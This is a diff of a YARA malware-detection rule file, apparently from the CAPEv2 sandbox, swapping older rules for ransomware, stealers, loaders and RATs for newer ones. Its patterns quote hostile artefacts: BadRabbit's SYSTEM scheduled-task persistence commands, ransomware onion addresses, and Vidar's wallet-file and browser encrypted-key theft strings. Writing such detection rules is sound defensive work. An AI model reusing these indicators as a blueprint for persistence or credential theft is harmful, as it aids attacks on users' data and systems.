+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/DoppelPaymer.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "73a2575671bafc31a70af3ce072d6f94ae172b12202baebba586a02524cb6f9d"
 		score = 75
 		quality = 70
-		tags = ""
+		tags = "FILE"
+		cape_type = "DoppelPaymer Payload"
 
 	strings:
-		$module_cfg = "moduleconfig"
-		$str_imp_01 = "Start"
-		$str_imp_02 = "Control"
-		$str_imp_03 = "FreeBuffer"
-		$str_imp_04 = "Release"
-		$module = "user_platform_check.dll"
-		$intro_routine = { 83 ec 40 8b ?? ?? ?? 53 8b ?? ?? ?? 55 33 ed a3 ?? ?? ?? ?? 8b ?? ?? ?? 56 57 89 ?? ?? ?? a3 ?? ?? ?? ?? 39 ?? ?? ?? ?? ?? 75 ?? 8d ?? ?? ?? 89 ?? ?? ?? 50 6a 40 8d ?? ?? ?? ?? ?? 55 e8 ?? ?? ?? ?? 85 c0 78 ?? 8b ?? ?? ?? 85 ff 74 ?? 47 57 e8 ?? ?? ?? ?? 8b f0 59 85 f6 74 ?? 57 6a 00 56 e8 ?? ?? ?? ?? 83 c4 0c eb ??}
+		$getproc32 = {81 FB ?? ?? ?? ?? 74 2D 8B CB E8 ?? ?? ?? ?? 85 C0 74 0C 8B C8 8B D7 E8 ?? ?? ?? ?? 5B 5F C3}
+		$cmd_string = "Setup run\\n" wide
 
 	condition:
-		6 of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Gootkit : FILE
+rule CAPE_Monsterv2 : FILE
 {
 	meta:
-		description = "Gootkit Payload"
-		author = "kevoreilly"
-		id = "8935fd10-ac79-5196-80c2-fc8f2fe185b5"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		description = "MonsterV2 Payload"
+		author = "doomedraven,YungBinary"
+		id = "4bc3546f-34ad-579e-9822-272a2b3c74e2"
+		date = "2025-09-06"
+		modified = "2025-09-12"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Gootkit.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "26704b6b0adca51933fc9d5e097930320768fd0e9355dcefc725aee7775316e7"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/MonsterV2.yar#L1-L21"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "d4e65f860e69b2eee8a818a4146d91b84ce6da30c8fa27593587932e4f0847a8"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Gootkit Payload"
+		cape_type = "MonsterV2 Payload"
+		packed = "fe69e8db634319815270aa0e55fe4b9c62ce8e62484609c3a42904fbe5bb2ab3"
 
 	strings:
-		$code1 = {C7 45 ?? ?? ?? 4? 00 C7 45 ?? ?? 10 40 00 C7 45 E? D8 ?? ?? 00 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 [1-2] 00 10 40 00 89 [5-6] 43 00 89 ?? ?? 68 E8 80 00 00 FF 15}
+		$decrypt_config = {
+            41 B8 0E 04 00 00
+            48 8D 15 ?? ?? ?? 00
+            48 8B C?
+            E8 ?? ?? ?? ?? [3-17]
+            4C 8B C?
+            48 8D 54 24 28
+            48 8B CE
+            E8 ?? ?? ?? ??
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and $decrypt_config
 }
-rule CAPE_Nanolocker : FILE
+rule CAPE_Varenyky : FILE
 {
 	meta:
-		description = "NanoLocker Payload"
+		description = "Varenyky Payload"
 		author = "kevoreilly"
-		id = "6fff6a27-a153-5461-9a75-2253c2f7d408"
+		id = "e01695fa-72a0-5d8e-86ab-8c909d28b8ec"
 		date = "2019-10-30"
 		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/NanoLocker.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "fe6c8a4e259c3c526f8f50771251f6762b2b92a4df2e8bfc705f282489f757db"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Varenyky.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "602f1b8b60b29565eabe2171fde4eb58546af68f8acecad402a7a51ea9a08ed9"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "NanoLocker Payload"
+		cape_type = "Varenyky Payload"
 
 	strings:
-		$a1 = "NanoLocker"
-		$a2 = "$humanDeadline"
-		$a3 = "Decryptor.lnk"
+		$onion = "jg4rli4xoagvvmw47fr2bnnfu7t2epj6owrgyoee7daoh4gxvbt3bhyd.onion"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
+		uint16( 0 ) == 0x5A4D and ( $onion )
 }
-rule CAPE_Ryuk : FILE
+rule CAPE_Bruteratel
 {
 	meta:
-		description = "Ryuk Payload"
+		description = "BruteRatel Payload"
 		author = "kevoreilly"
-		id = "594bbb8d-1f85-5a01-a864-ac2d95c45bf9"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		id = "61b951e4-0c27-59c0-8ea2-715b673fdcee"
+		date = "2024-07-11"
+		modified = "2024-07-11"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Ryuk.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "b4463993d8956e402b927a3dcfa2ca9693a959908187f720372f2d3a40e6db0c"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/BruteRatel.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "0984977c716d6f8e068c045166eb5db77c9fbce27513e555dceca348375f1a66"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "Ryuk Payload"
+		tags = ""
+		cape_type = "BruteRatel Payload"
 
 	strings:
-		$ext = ".RYK" wide
-		$readme = "RyukReadMe.txt" wide
-		$main = "InvokeMainViaCRT"
-		$code = {48 8B 4D 10 48 8B 03 48 C1 E8 07 C1 E0 04 F7 D0 33 41 08 83 E0 10 31 41 08 48 8B 4D 10 48 8B 03 48 C1 E8 09 C1 E0 03 F7 D0 33 41 08 83 E0 08 31 41 08}
+		$syscall1 = {49 89 CA 4? 89 ?? (41 FF|FF)}
+		$syscall2 = {49 89 CA 48 8B 44 24 ?? FF 64 24}
+		$jmpapi = {49 89 ?? 10 49 C7 45 08 ?? 00 00 00 E8 00 00 00 00 ?? (48|49) 83 [2] 41 FF E2}
+		$decode = {89 C2 8A 14 17 40 38 EA 75 06 FF C0 89 03 EB 0B 41 88 14 08 48 FF C1 FF 03 EB}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 3 of ( $* )
+		2 of them
 }
-rule CAPE_Badrabbit : FILE
+rule CAPE_Wanacry : FILE
 {
 	meta:
-		description = "BadRabbit Payload"
+		description = "WanaCry Payload"
 		author = "kevoreilly"
-		id = "c7204772-6f14-57b7-88c1-e9156f9897d5"
+		id = "a6525e0f-fccd-5542-9be8-e42d708fe502"
 		date = "2019-10-30"
-		modified = "2019-10-30"
+		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/BadRabbit.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "309e14ab4ea2f919358631f9d8b2aaff1f51e7708b6114e4e6bf4a9d9a5fc86c"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/WanaCry.yar#L1-L16"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "16d5e39f043d27bbf22f8f21e13971b7e0709b07e44746dd157d11ee4cc51944"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "BadRabbit Payload"
+		cape_type = "WanaCry Payload"
 
 	strings:
-		$a1 = "caforssztxqzf2nm.onion" wide
-		$a2 = "schtasks /Create /SC once /TN drogon /RU SYSTEM" wide
-		$a3 = "schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal" wide
+		$exename = "@WanaDecryptor@.exe"
+		$res = "%08X.res"
+		$pky = "%08X.pky"
+		$eky = "%08X.eky"
+		$taskstart = {8B 35 58 71 00 10 53 68 C0 D8 00 10 68 F0 DC 00 10 FF D6 83 C4 0C 53 68 B4 D8 00 10 68 24 DD 00 10 FF D6 83 C4 0C 53 68 A8 D8 00 10 68 58 DD 00 10 FF D6 53}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Conti : FILE
+rule CAPE_Vidar : FILE
 {
 	meta:
-		description = "Conti Ransomware"
-		author = "kevoreilly"
-		id = "c94aed07-0eaf-5b51-a81e-e1992543673a"
-		date = "2020-10-19"
-		modified = "2021-03-15"
+		description = "Vidar Payload"
+		author = "kevoreilly,rony"
+		id = "9e4e797f-880e-54eb-ad44-caad0ec5683c"
+		date = "2019-10-30"
+		modified = "2023-04-21"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Conti.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "c9842f93d012d0189b9c6f10ad558b37ae66226bbb619ad677f6906ccaf0e848"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Vidar.yar#L1-L22"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "5d4c030536ed41cf4e0dcb77b2fe4553d789ee2b8095a4b3e050692335a8709d"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Conti Payload"
+		cape_type = "Vidar Payload"
+		packed = "0cff8404e73906f3a4932e145bf57fae7a0e66a7d7952416161a5d9bb9752fd8"
 
 	strings:
-		$crypto1 = {8A 07 8D 7F 01 0F B6 C0 B9 ?? 00 00 00 2B C8 6B C1 ?? 99 F7 FE 8D [2] 99 F7 FE 88 ?? FF 83 EB 01 75 DD}
-		$website1 = "https://contirecovery.info" ascii wide
-		$website2 = "https://contirecovery.best" ascii wide
+		$decode = {FF 75 0C 8D 34 1F FF 15 ?? ?? ?? ?? 8B C8 33 D2 8B C7 F7 F1 8B 45 0C 8B 4D 08 8A 04 02 32 04 31 47 88 06 3B 7D 10 72 D8}
+		$xor_dec = {0F B6 [0-5] C1 E? ?? 33 ?? 81 E? [0-5] 89 ?? 7C AF 06}
+		$wallet = "*wallet*.dat" fullword ascii wide
+		$s1 = "\"os_crypt\":{\"encrypted_key\":\"" fullword ascii wide
+		$s2 = "screenshot.jpg" fullword ascii wide
+		$s3 = "\\Local State" fullword ascii wide
+		$s4 = "Content-Disposition: form-data; name=\"" fullword ascii wide
+		$s5 = "CC\\%s_%s.txt" fullword ascii wide
+		$s6 = "History\\%s_%s.txt" fullword ascii wide
+		$s7 = "Autofill\\%s_%s.txt" fullword ascii wide
+		$s8 = "Downloads\\%s_%s.txt" fullword ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		uint16be( 0 ) == 0x4d5a and 6 of them
 }
-rule CAPE_Codoso : FILE
+rule CAPE_Cerber : FILE
 {
 	meta:
-		description = "Codoso Payload"
+		description = "Cerber Payload"
 		author = "kevoreilly"
-		id = "4c3d8d77-ffa9-576d-bf88-7b5a1bfd1811"
+		id = "edf08795-cf54-5822-8bc4-35cfba0fe8e8"
 		date = "2019-10-30"
-		modified = "2019-10-30"
+		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Codoso.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "32c9ed2ac29e8905266977a9ee573a252442d96fb9ec97d88642180deceec3f8"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Cerber.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "16a8f808c28d3b142c079a305aba7f553f2452e439710bf610a06f8f2924d5a3"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Codoso Payload"
+		cape_type = "Cerber Payload"
 
 	strings:
-		$a1 = "WHO_A_R_E_YOU?"
-		$a2 = "DUDE_AM_I_SHARP-3.14159265358979"
-		$a3 = "USERMODECMD"
+		$code1 = {33 C0 66 89 45 8? 8D 7D 8? AB AB AB AB AB [0-2] 66 AB 8D 45 8? [0-3] E8 ?? ?? 00 00}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Cryptoshield : FILE
+rule CAPE_Adaptixbeacon
 {
 	meta:
-		description = "Cryptoshield Payload"
-		author = "kevoreilly"
-		id = "a7b60a0d-7d46-59c9-8273-ee23bae3fbbc"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		description = "AdaptixBeacon Payload"
+		author = "enzok"
+		id = "ae0bc10c-cfcd-59d4-8c24-34a03debe370"
+		date = "2025-06-16"
+		modified = "2025-10-28"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Cryptoshield.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "46064b4c69cb1af01330c5d194ef50728e0f0479e9fbf72828822935f8e37ac6"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/AdaptixBeacon.yar#L1-L18"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "f78f5803be5704420cbb2e0ac3c57fcb3d9cdf443fbf1233c069760bee115b5d"
+		logic_hash = "2c1d09cd5e19e5a09dde65411691afd5922959d4a7b5232b28ebf56f26d2f07d"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "Cryptoshield Payload"
+		tags = ""
+		cape_type = "AdaptixBeacon Payload"
 
 	strings:
-		$a1 = "CRYPTOSHIELD." wide
-		$a2 = "Click on Yes in the next window for restore work explorer" wide
-		$a3 = "r_sp@india.com - SUPPORT"
+		$conf_1 = {8D ?? ?? E8 [3] 00 4? 89 [1-2] 4? 8B 4C 24 ?? E8 [3] 00 4? 8B 53 48 66 [0-1] 89 04 ?? E8}
+		$conf_2 = {E8 [3] 00 48 8B 4C 24 ?? 48 89 43 78 E8 [3] 00 48 8B 4C 24 ?? 89 83 80 00 00 00 E8 [3] 00 03 83 80 00 00 00 48 8B 4C 24}
+		$conf_3 = {E8 [3] 00 4? 8B 4C 24 ?? 4? 89 ?? 4? 89 43 58 E8 [3] 00 4? 8B 4C 24 ?? 4? 89 ?? 4? 89 43 60 E8 [3] 00 4? 8B 4C 24 ?? 4? 89 ?? 4? 89 43 68}
+		$conf_4 = {8D ?? ?? 4? 89 ?? FF ?? 4? 89 ?? 4? 89 ?? 4? 8B ?? FF ?? ?? 4? 8B ?? 48 66 ?? 89 ?? ?? EB}
+		$conf_5 = {48 89 ?? 4? 89 ?? FF ?? 4? 89 ?? 4? 89 D9 4? 89 ?? ?? 4? 8B 03 FF ?? ?? 4? 89 ?? 4? 89 ?? 4? 89 ?? ?? 4? 8B 03 FF ?? ?? 4? 89}
+		$wininet_1 = {B9 77 00 00 00 [0-4] E8 [4] B9 69 00 00 00 88 ?4 24 [0-4] E8 [4] B9 6E 00 00 00 88 ?4 24}
+		$wininet_2 = {B9 69 00 00 00 88 ?4 24 [0-4] E8 [4] B9 6E 00 00 00 88 ?4 24 [0-4] E8 [4] B9 65 00 00 00 88 ?4 24}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
+		1 of ( $conf_* ) and 1 of ( $wininet_* )
 }
-rule CAPE_Remcos : FILE
+
+rule CAPE_Netsupport : FILE
 {
 	meta:
-		description = "Remcos Payload"
-		author = "kevoreilly"
-		id = "f77295ca-02d5-5b2c-80b8-b6566610bff8"
-		date = "2019-10-30"
-		modified = "2022-05-10"
+		description = "Detects NetSupport Manager RAT on disk or in memory"
+		author = "YungBinary"
+		id = "c517193e-bee3-59c4-9fbf-aad01ee13379"
+		date = "2025-10-17"
+		modified = "2025-10-17"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Remcos.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "38142e784ad437d9592353b924f74777bb62e5ed176c811230a2021a437d4710"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/NetSupport.yar#L3-L16"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "d12e46d74ae0ba9f599d27dc2f55ff92a6648accbcd1a43cc3f1a9a2755e5fc7"
 		score = 75
-		quality = 68
+		quality = 70
 		tags = "FILE"
-		cape_type = "Remcos Payload"
+		cape_type = "NetSupport Payload"
 
 	strings:
-		$name = "Remcos" nocase
-		$time = "%02i:%02i:%02i:%03i"
-		$crypto1 = {81 E1 FF 00 00 80 79 ?? 4? 81 C9 00 FF FF FF 4? 8A ?4 8?}
-		$crypto2 = {0F B6 [1-7] 8B 45 08 [0-2] 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 ?? ?? FF FF 30 06 47 3B 7D 0C 72}
+		$a1 = "NetSupport Manager" wide
+		$b1 = "NetSupport Remote Control" wide
+		$s1 = "Client Application" wide
+		$s2 = "NetSupport Ltd" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $name ) and ( $time ) and any of ( $crypto* )
+		uint16( 0 ) == 0x5a4d and ( ( pe.imports ( "PCICL32.dll" , "_NSMClient32@8" ) ) or ( ( $a1 and $b1 ) or ( $s1 and $s2 ) ) )
 }
-rule CAPE_Rcsession
+rule CAPE_Koiloader
 {
 	meta:
-		description = "RCSession Payload"
-		author = "kevoreilly"
-		id = "841e6bd1-4f09-54dc-8dec-2e9423a34003"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		description = "KoiLoader"
+		author = "YungBinary"
+		id = "258e8857-7ea6-5098-9949-06d9d83853d4"
+		date = "2024-10-25"
+		modified = "2024-10-25"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/RCSession.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "ebd1e9e615a91c35b36332cad55519607323469df738cec4464288b45787630d"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/KoiLoader.yar#L1-L35"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "b462e3235c7578450b2b56a8aff875a3d99d22f6970a01db3ba98f7ecb6b01a0"
+		logic_hash = "264a536632f8f11c904b00c9d2e505b3263c733ad8fbc2ef19c25a5ad58cef90"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_type = "RCSession Payload"
+		cape_type = "KoiLoader Payload"
 
 	strings:
-		$a1 = {56 33 F6 39 74 24 08 7E 4C 53 57 8B F8 2B FA 8B C6 25 03 00 00 80 79 05 48 83 C8 FC 40 83 E8 00 74 19 48 74 0F 48 74 05 6B C9 09 EB 15 8B C1 C1 E8 02 EB 03 8D 04 09 2B C8}
-		$a2 = {83 C4 10 85 C0 74 ?? BE ?? ?? ?? ?? 89 74 24 10 E8 ?? ?? ?? ?? 6A 03 68 48 0B 00 00 56 53 57 68 02 00 00 80 E8 ?? ?? ?? ?? 83 C4 18 85 C0 74 18 E8 ?? ?? ?? ?? 6A 03 68 48}
+		$chunk_1 = {
+            68 27 11 68 05
+            8B 45 ??
+            50
+            E8 ?? ?? ?? ??
+            83 C4 08
+            89 45 ??
+            68 15 B1 B3 09
+            8B 4D ??
+            51
+            E8 ?? ?? ?? ??
+            83 C4 08
+            89 45 ??
+            68 B5 96 AA 0D
+            8B 55 ??
+            52
+            E8 ?? ?? ?? ??
+            83 C4 08
+            89 45 ??
+            6A 00
+            FF 15 ?? ?? ?? ??
+        }
 
 	condition:
-		( any of ( $a* ) )
+		$chunk_1
 }
-rule CAPE_Blister_1 : FILE
+rule CAPE_Qakbot5_1 : FILE
 {
 	meta:
-		description = "Blister Loader"
-		author = "kevoreilly"
-		id = "525fc600-2afc-5cf6-bf55-4ce0ea264dca"
-		date = "2022-05-10"
-		modified = "2023-09-20"
+		description = "QakBot v5 Payload"
+		author = "kevoreilly, enzok"
+		id = "48866cdd-f60e-50b8-85f9-573710934b0b"
+		date = "2019-10-30"
+		modified = "2024-04-28"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Blister.yar#L1-L17"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "afb77617a4ca637614c429440c78da438e190dd1ca24dc78483aa731d80832c2"
-		hash = "d3eab2a134e7bd3f2e8767a6285b38d19cd3df421e8af336a7852b74f194802c"
-		logic_hash = "f26d85fdf0eb07e67fe38c43c5f6d024bfb7b2a333cb3411f5cdcff6bf5db12d"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/QakBot.yar#L1-L15"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "59559e97962e40a15adb2237c4d01cfead03623aff1725616caeaa5a8d273a35"
+		logic_hash = "cc23a92f45619d44af824128b743c259dd9dfa7cb5106932f3425f3dfd1dccdf"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Blister Loader"
+		cape_type = "QakBot Payload"
+		packed = "f4bb0089dcf3629b1570fda839ef2f06c29cbf846c5134755d22d419015c8bd2"
 
 	strings:
-		$protect1 = {50 6A 20 8D 45 ?? 50 8D 45 ?? 50 6A FF FF D7}
-		$protect2 = {48 83 C9 FF 48 8D 55 ?? FF D6 48 8D 87 [2] 00 00 48 8D 4D ?? FF D0}
-		$lock1 = {B9 FF FF FF 7F 89 75 FC 8B C1 F0 FF 45 FC 83 E8 01 75}
-		$lock2 = {B8 FF FF FF 7F 41 BC 01 00 00 00 89 45 40 F0 FF 4D 40 49 2B C4 75}
-		$decode = {0F BE C0 49 03 CC 41 33 C1 44 69 C8 [4] 41 8B C1 C1 E8 0F 44 33 C8 8A 01 84 C0 75 E1 41 81 F9 [4] 74}
+		$loop = {8B 75 ?? 48 8B 4C [2] FF 15 [4] 48 8B 4C [2] 48 8B 01 FF 50 ?? 8B DE 48 8B 4C [2] 48 85 C9 0F 85 [4] EB 4E}
+		$c2list = {0F B7 1D [4] B? [2] 00 00 E8 [4] 8B D3 4? 89 45 ?? 4? 33 C9 4? 8D 0D [4] 4? 8B C0 4? 8B F8 E8}
+		$campaign = {0F B7 1D [4] B? [2] 00 00 E8 [4] 8B D3 4? 89 44 24 ?? 4? 33 C9 4? 8D 0D [4] 4? 8B C0 4? 8B F8 E8}
 
 	condition:
 		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule CAPE_Aurastealer
+rule CAPE_Qakbot4_1 : FILE
 {
 	meta:
-		description = "AuraStealer Payload"
-		author = "enzok"
-		id = "1fe058a8-1e87-51bb-8b5c-914442bca2e5"
-		date = "2025-09-02"
-		modified = "2025-09-02"
+		description = "QakBot v4 Payload"
+		author = "kevoreilly"
+		id = "d2c5316c-22cc-5b6d-b6a2-b1d23a06d16b"
+		date = "2019-10-30"
+		modified = "2024-04-28"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/AuraStealer.yar#L1-L18"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "960b83639a898509dc272f3235822401a8f861fa6607991993285b618b882d8b"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/QakBot.yar#L17-L35"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "b2870e33abffbb3ff49b7891b0f5c538ab48ee63da5553929d4e37dec921344f"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_type = "AuraStealer Payload"
-		unpacked = "a9c47f10d5eb77d7d6b356be00b4814a7c1e5bb75739b464beb6ea03fc36cc85"
-		packed = "bac52ffc8072893ff26cdbf1df1ecbcbb1762ded80249d3c9d420f62ed0dc202"
+		tags = "FILE"
+		cape_type = "QakBot Payload"
 
 	strings:
-		$conf = {8D BE ?? 00 00 00 68 00 40 00 00 5? 5? FF D1 83 C4 ?? 8B 07 8B 57 04 29 C2}
-		$key1 = {FF D2 8B 2B 8D 75 ?? 8B 5D ?? 33 5D ?? 8D 45}
-		$key2 = {89 0B 89 F9 5? 5? 5? E8 [4] 8B 3F 8D 6F 38 8B 77 30 33 77 34 8D 47 20 8D 4C 24 ?? 89 FA 5? E8}
-		$keyexpansion = {31 C0 8A 1C 82 88 1C 81 8A 5C 82 01 88 5C 81 01 8A 5C 82 02 88 5C 81 02 8A 5C 82 03 88 5C 81 03 4? 83 F8 08 75 ?? B? 08 00 00 00}
-		$antivm2 = {8B 43 04 8B 0D [4] 3B 81 [4] B? [2] 00 00 B? [2] 00 00 0F 44 D1 85 C0 0F 44 D1 8B 8A [4] 03 8A [4] FF E1 31 FF EB ?? 8B 78 0C 33 78 10 B? [4] 03 05 [4] FF D0}
-		$antivm1 = {39 04 11 0f 94 C3 8B 44 ?? ?? 85 C0}
+		$crypto1 = {8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 C9 00 FF FF FF 41}
+		$sha1_1 = {5? 33 F? [0-9] 89 7? 24 ?? 89 7? 24 ?? 8? [1-3] 24 [1-4] C7 44 24 ?0 01 23 45 67 C7 44 24 ?4 89 AB CD EF C7 44 24 ?8 FE DC BA 98 C7 44 24 ?C 76 54 32 10 C7 44 24 ?0 F0 E1 D2 C3}
+		$sha1_2 = {33 C0 C7 01 01 23 45 67 89 41 14 89 41 18 89 41 5C C7 41 04 89 AB CD EF C7 41 08 FE DC BA 98 C7 41 0C 76 54 32 10 C7 41 10 F0 E1 D2 C3 89 41 60 89 41 64 C3}
+		$anti_sandbox1 = {8D 4? FC [0-1] E8 [4-7] E8 [4] 85 C0 7E (04|07) [4-7] 33 (C0|D2) 74 02 EB FA}
+		$anti_sandbox2 = {8D 45 ?? 50 E8 [2] 00 00 59 68 [4] FF 15 [4] 89 45 ?? 83 7D ?? 0F 76 0C}
